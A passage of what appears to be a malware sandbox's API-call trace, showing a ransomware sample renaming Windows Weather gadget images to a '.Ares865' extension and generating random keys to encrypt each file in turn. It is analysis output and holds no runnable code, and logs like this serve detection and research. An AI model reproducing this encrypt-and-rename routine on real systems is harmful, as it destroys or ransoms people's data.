(x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png.ares865"), dwFlags=0x1) returned 1 [0116.621] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.621] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12757) returned 1 [0116.621] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.622] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.622] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.627] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.627] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.627] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.Ares865") returned 94 [0116.627] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png.ares865"), dwFlags=0x1) returned 1 [0116.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=325) returned 1 [0116.629] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.630] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.630] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.634] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.634] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.Ares865") returned 95 [0116.635] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png.ares865"), dwFlags=0x1) returned 1 [0116.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=373) returned 1 [0116.636] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.637] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.637] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.640] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.641] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.641] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.641] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.Ares865") returned 85 [0116.641] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png.ares865"), dwFlags=0x1) returned 1 [0116.643] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.643] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=729) returned 1 [0116.643] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.644] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.644] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.646] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.647] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.647] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.Ares865") returned 102 [0116.648] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png.ares865"), dwFlags=0x1) returned 1 [0116.649] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.649] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=399) returned 1 [0116.650] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.650] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.650] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.654] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.654] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.654] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.655] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.Ares865") returned 93 [0116.655] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png.ares865"), dwFlags=0x1) returned 1 [0116.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=399) returned 1 [0116.657] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.657] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.657] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.660] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.660] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.660] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.661] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.Ares865") returned 98 [0116.661] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png.ares865"), dwFlags=0x1) returned 1 [0116.663] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.663] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=482) returned 1 [0116.663] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.664] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.664] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.669] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.669] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.670] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.Ares865") returned 97 [0116.670] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png.ares865"), dwFlags=0x1) returned 1 [0116.671] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.671] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30094) returned 1 [0116.671] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.672] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.672] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.675] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.676] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.676] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.677] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.Ares865") returned 102 [0116.677] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.679] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.679] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28123) returned 1 [0116.679] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.680] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.680] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.684] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.684] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.684] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.685] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.Ares865") returned 107 [0116.685] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png.ares865"), dwFlags=0x1) returned 1 [0116.686] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28035) returned 1 [0116.687] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.687] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.687] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.691] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.692] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.692] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.Ares865") returned 101 [0116.693] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png.ares865"), dwFlags=0x1) returned 1 [0116.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32480) returned 1 [0116.695] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.696] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.696] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.708] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.709] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.709] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png.Ares865") returned 100 [0116.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png.ares865"), dwFlags=0x1) returned 1 [0116.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31406) returned 1 [0116.711] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.712] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.712] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.716] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.717] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.717] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.718] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png.Ares865") returned 114 [0116.718] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png.ares865"), dwFlags=0x1) returned 1 [0116.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.720] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19451) returned 1 [0116.720] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.721] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.721] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.724] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.724] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.724] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.725] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.Ares865") returned 128 [0116.725] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.726] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 